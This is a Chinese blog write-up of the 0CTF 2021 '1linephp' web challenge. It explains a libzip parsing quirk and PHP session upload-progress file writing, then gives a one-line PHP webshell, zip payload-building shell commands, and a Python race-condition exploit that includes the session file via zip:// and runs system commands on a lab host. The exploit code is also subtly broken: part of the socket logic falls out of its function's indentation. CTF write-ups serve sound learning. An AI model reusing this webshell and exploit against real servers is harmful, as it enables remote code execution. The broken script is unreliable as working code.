【0CTF 2021】1linephp 题目复现

最新推荐文章于 2025-12-16 12:53:59 发布
原创 最新推荐文章于 2025-12-16 12:53:59 发布 · 437 阅读 · 19 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #php

题目

<?php
($_=@$_GET['yxxx'].'.php') && @substr(file($_)[0],0,6) === '@<?php' ? include($_) : highlight_file(__FILE__) && include('phpinfo.html');

解析

PHP的zip扩展依赖libzip库,其解析ZIP文件的逻辑是从文件末尾反向查找关键标识

  1. 先在文件末尾范围内查找EOCD(End of Central Directory,ZIP 文件的尾部标识,有固定 “MAGIC” 值);
  2. 定位CDH:通过EOCD中记录的offset(偏移量),向前找到CDH(Central Directory Header,中央目录头);
  3. 定位压缩数据:再通过CDH中记录的offset,向前找到LFH(Local File Header,本地文件头),最终读取压缩文件数据。

只要正确修改EOCD和CDH中的offset,让其指向正确的CDH和LFH,就可以在ZIP文件的开头、末尾或各部分之间插入任意多余数据,libzip仍能正常解析

注意:如果在zip_open时开启了ZIP_CHECKCONS这个选项,那么解析zip时的检查会更严格。

PHP的PHP_SESSION_UPLOAD_PROGRESS(session.upload_progress.name默认值)特性是 “生成恶意文件” 的载体,其核心作用是将可控数据写入固定路径的session文件:

  1. session.upload_progress.enabled INI选项开启时(默认开启),PHP 处理文件上传时,会将上传进度信息(包括PHP_SESSION_UPLOAD_PROGRESS参数的自定义值)写入session文件;
  2. session文件路径固定:默认路径为/tmp/sess_<PHPSESSID>,只要知道PHPSESSID(可通过Cookie指定),就能精确定位文件;
  3. 通过上传大一点的文件来延长session文件的生存周期,便于恶意数据能被读取。

题解

通过题目可以看到session.upload_progress.enabled和session.upload_progress.name的设置。

在Cookie中找到PHPSESSID。

构造一句话木马用于触发include($_):@<?php $_GET['0']($_GET['1']);?>,写入include.php。在Linux终端执行以下命令,生成payload。upload_progress_前缀的作用是适配PHP Session上传进度的格式:PHP 在记录上传进度时,Session 文件中会包含upload_progress_<key>格式的键名。

zip a.zip include.php
echo -n "upload_progress_" > f
cat f a.zip > b.zip
zip -F b.zip --out c.zip

将大佬的exp修改使用:

import requests
import socket
import time

port = 50080
php_session_id = "l645nf32feems2k48phr3nk2nr"
ip = "192.168.88.128"

with open("c.zip", "rb") as f:
    data = f.read()

PREFIX = "upload_progress_"
payload = data[len(PREFIX):]

def exp():
    res = requests.get(
        f"http://{ip}:{port}/",
        params={
            "yxxx": f"zip:///tmp/sess_{php_session_id}#include",
            "0": "system",
            "1": "ls /",    #cat /dd810fc36330c200a_flag/flag
        },
    )
    print(res.text)


def build_http_request_packet(req: requests.PreparedRequest):
    packet = b""
    packet += f"{req.method} {req.path_url} HTTP/1.1\r\n".encode()
    for header, value in req.headers.items():
        packet += f"{header}: {value}\r\n".encode()
    packet += b"\r\n"
    if req.body is not None:
        if "Content-Length" in req.headers:
            if type(req.body) is str:
                packet += req.body.encode()
            else:
                packet += req.body
        else:
            for part in req.body:
                packet += f"{len(part):x}\r\n".encode()
                packet += f"{part}\r\n".encode()
            packet += b"0\r\n\r\n"
    return packet


def do_so():
    req = requests.Request(
        "POST",
        f"http://{ip}:{port}/",
        headers={"Host": f"{ip}:{port}"},
        cookies={"PHPSESSID": php_session_id},
        data={
            "PHP_SESSION_UPLOAD_PROGRESS": payload,
        },
        files={"file": ("simple.txt", b"ccl" * 4096)}, # 延长session文件的生存周期
    )
    packet = build_http_request_packet(req.prepare())
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((f"{ip}", port))
# 使一句话木马被充分执行
    s.sendall(packet[:-8])
    exp()
    s.sendall(packet[-8:])
    s.close()


if __name__ == "__main__":
    do_so()

参考

WriteUp参考:

https://github.com/waderwu/My-CTF-Challenges/tree/master/0ctf-2021/1linephp#writeup

payload生成参考:

https://github.com/perfectblue/ctf-writeups/tree/master/2021/0ctf-2021-quals/onelinephp

dongloong
关注
CTF题目复现总结-hashcat 1
weixin_42487326的博客
04-03 570
CTF题目复现总结-hashcat 1
CTF】利用dockerfile复现CTF题目
网络空间安全|人工智能|计算机科学
10-22 811
(最后的点不能丢)
CTF题目复现总结-二维码 1
weixin_42487326的博客
02-25 1351
CTF题目复现总结-二维码 1
*CTF2021部分题目解题思路及exp
liucc09的博客
01-18 3355
babyheap 这是pwn里面唯一的传统heap题,使用的是新的libc2.27,chunk被free到tcache后bk位置会被写入一个地址,再次free时如果bk有这个地址会和tcache里的所有chunk挨个比较,发现一样的就报double free tcache 2,因此要再free之后把bk置零就行了。 题目第一个坑,在edit方法里面读入数据是从chunk+8的位置的开始写,也就是不让修改fd,这导致虽然有UAF,也无法很方便的实现任意地址写。解决方法为构造重叠的chunk,从而改到tcach
蓝牙安全入门——两道CTF题目复现
weixin_66578482的博客
06-10 3489
🚀🚀蓝牙中的安全管理协议(Security Manager Protocol,SMP)是负责蓝牙设备间的配对和加密的协议。🚀🚀SMP广泛应用于需要安全数据传输的蓝牙设备,如智能手表、健身追踪器、无线耳机和医疗设备。🚀🚀SMP的主要功能之一是处理设备间的配对过程。🚀🚀最近一直对车联网比较感兴趣,但是面试官说我有些技术栈缺失,所以还得狠狠补,先从蓝牙开始吧,因为刚好有道CTF题目可以复现一下。🚀🚀虽然SMP提供了题目 蓝牙钥匙的春天 题目 low_energy_crypto
*CTF2021部分复现
SopRomeo的博客
01-20 1643
web oh-my-note 从源码可以看出session 是经过两次随机进行设置,首先随机取得user_id,在通过user_id和提交的时间取得note_id 看到 view路由 可以发现我们可以通过这个公开页面获得note_id 网页中恰好也给到了admin 的note_id 而我们发现在my_notes 这个路由我们有两种方式看到提交的note 一种session,另一种是GET请求发送user_id 很明显,题目意思要求爆破user_id 创建用户和提交时间可能存在几毫秒的偏差 源码中采
[CTF]SCTF2021 WEB复现(详细版)
Sapphire037的博客
01-09 4768
Loginme 下载附件得到源码,题目让我们本地访问,也就是要伪造ip,但是是有检测的,源码: package middleware import ( "github.com/gin-gonic/gin" ) func LocalRequired() gin.HandlerFunc { return func(c *gin.Context) { if c.GetHeader("x-forwarded-for") != "" || c.GetHeader("x-client-ip") != ""
利用GitHub、docker部署CTF-web题目复现
wyj_1216 House
08-07 6148
前言 前面写了kali linux的docker安装以及在docker上部署搭建sqli-labs靶场,这篇文章简单介绍利用GitHub和docker简单搭建CTF-web题目进行复现 学习记录 环境准备 这里有一个非常好的,实用的网站 https://github.com/CTFTraining/CTFTraining 里面包含了很多web题目,利用docker-compose搭建 准备docker-compose 在终端运行 apt-get install docker docker-compose
[红明谷CTF 2021]JavaWeb
Mrs_H的博客
04-08 2792
[红明谷CTF 2021]JavaWeb 一.前言 好像是已经很久不刷题了,因为最近一直在忙着复习高数和专业课,拿不出太多的时间来打CTF。但是这次也总算是找到了点时间,做道java的简单题来放松一下,不能总是学那些书本上的知识了,感觉学多了也会烦。 二.正文 这道题目上来就让我们访问/login目录,所以我们直接访问试试看。 服务器那边又让我们访问/json的路径,但是我们如果用post方法对服务器进行访问的话,服务器又会返回另外的结果。 这里的登陆失败,就表明我们需要进行身份验证,我们尝试输入一对用
github+docker复现CTF-web题目
MercyLin的博客
09-11 3911
git clone + 网址 + 本地目录 例如我要复现rctf的一道题目,首先我在github上找到这道题目 点击Clone复制网址
[CTF复现]N1CTF2021-queryallthings
anwen12的博客
11-24 932
N1CTF2021-queryallthethings 0x01 osquery 突破 开局一张图,答案全靠猜 看到sql注入冲压!. 一顿fuzz发现是pgsql!!! 虫虫 堆叠注入 查一下用户 查一下权限, yi? 怎么什么都没有??? 这里可以通过一个特性来确定 https://www.sqlite.org/schematab.html http://47.57.246.66:12321/?str=world'; select * from sqlite_temp_master;--+ 可以理解
CTF题目复现总结-[GKCTF 2021]FireFox Forensics 1
weixin_42487326的博客
03-17 343
CTF题目复现总结-[GKCTF 2021]FireFox Forensics 1
2023年全国网络安全行业职业技能大赛-电子数据取证分析师-初赛C卷(15号)-Writeup
Aluxian_的博客
12-11 482
总体要求:根据提供的检材,完成指定电子数据提取。
渗透测试行业术语扫盲(第六篇)—— Web安全专用类术语
qq_39241682的博客
12-09 867
Web是渗透测试的主战场。要在此作战,不仅要懂攻击漏洞(如上一篇所述),更要理解支撑Web运行的基础身份机制、浏览器安全规则以及攻防双方使用的具体工具与载荷。本篇将深入Web安全的“皮下组织”,从维持登录状态的Cookie,到攻击者留下的Webshell,再到防御者的CSP策略,为你揭示这个战场的完整规则与装备图景。
Web安全】SSRF
qinjilll的博客
12-12 939
SSRF漏洞分析与防御 SSRF(服务器端请求伪造)是一种由服务端发起恶意请求的安全漏洞,允许攻击者访问与服务器相连的内网系统。漏洞成因主要是服务端未对目标地址进行过滤限制,常见于社交分享、在线翻译、图片加载等功能点。 漏洞利用方式包括: 探测内网存活主机和开放端口 利用file协议读取本地敏感文件 访问内网未授权服务(如Redis、MySQL) 结合其他漏洞实现命令执行 防御措施: 白名单限制:仅允许访问可信域名/IP和协议 输入校验:过滤特殊字符,校验IP归属 内网服务加固:禁用未授权访问,设置强密码
基于图神经网络+大模型的网络安全APT检测系统:从流量日志到攻击链溯源的实战落地
最新发布
qq_74383080的博客
12-16 319
本文提出了一种基于图神经网络(GNN)和大型语言模型(LLM)的高级持续性威胁(APT)检测系统。该系统通过构建"主机-进程-网络"异构图,利用GraphSAGE识别异常行为模式,并结合LogsBERT进行语义分析,最后通过LLM生成攻击链报告。实际部署结果显示,该系统将APT检出率从传统方法的15%提升至97.3%,误报率从120次/天降至3次/天,攻击溯源时间从8小时缩短至25分钟。
PolarCTF网络安全2025冬季个人挑战赛 wp
lpppp小公主的博客
12-09 951
PolarCTF网络安全2025冬季个人挑战赛复现
【网络安全】二、常用网络安全管理工具
dochyi的博客
12-12 688
本文介绍了5个常用网络安全管理工具(ping、ipconfig、netstat、net、at)的实验操作。通过搭建由两台PC组成的局域网环境,详细演示了各工具的功能应用:使用ping测试连通性,ipconfig查看IP配置,netstat监控端口状态,net进行用户和共享管理,at设置定时任务。实验重点分析了工具在故障排查、网络监控和安全防护中的作用,如通过netstat检测异常连接、net命令管理用户权限等。最后总结了各工具的使用要点和安全实践意义,强调合理配置参数和权限管理的重要性,为网络基础运维提供实
网络安全思路分享
猪肉炖白菜
12-11 946
开头:获取明确书面授权,定义范围(如域名、IP,排除破坏性测试),符合PCI标准。:若范围允许,尝试横向移动,然后记录发现,包括CVSS风险评分、重现步骤和修复建议。从候选人1的资产识别和漏洞测试步骤,以及2号的授权和OWASP Top 10强调入手,优越方法采用分阶段框架结合明确规则。候选人1的聚合和基线良好,但2号的ML和ATT&CK整合更先进,符合Prophet Security调优指南。候选人1的NAC和分区基础,但2号的MDM和零信任更强劲,符合NIST远程工作指导。端点强制EDR和补丁管理。
2021 N1CTF信息安全挑战赛真题解析
对于压缩包文件"2021 N1CTF CTF 真题.zip"的内容,我们可以预期包括了上述各个领域的挑战题目以及对应的解答和提示。这些资源对于那些希望提高自己网络安全技能的人士来说是宝贵的参考资料。通过实际操作和解题,...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值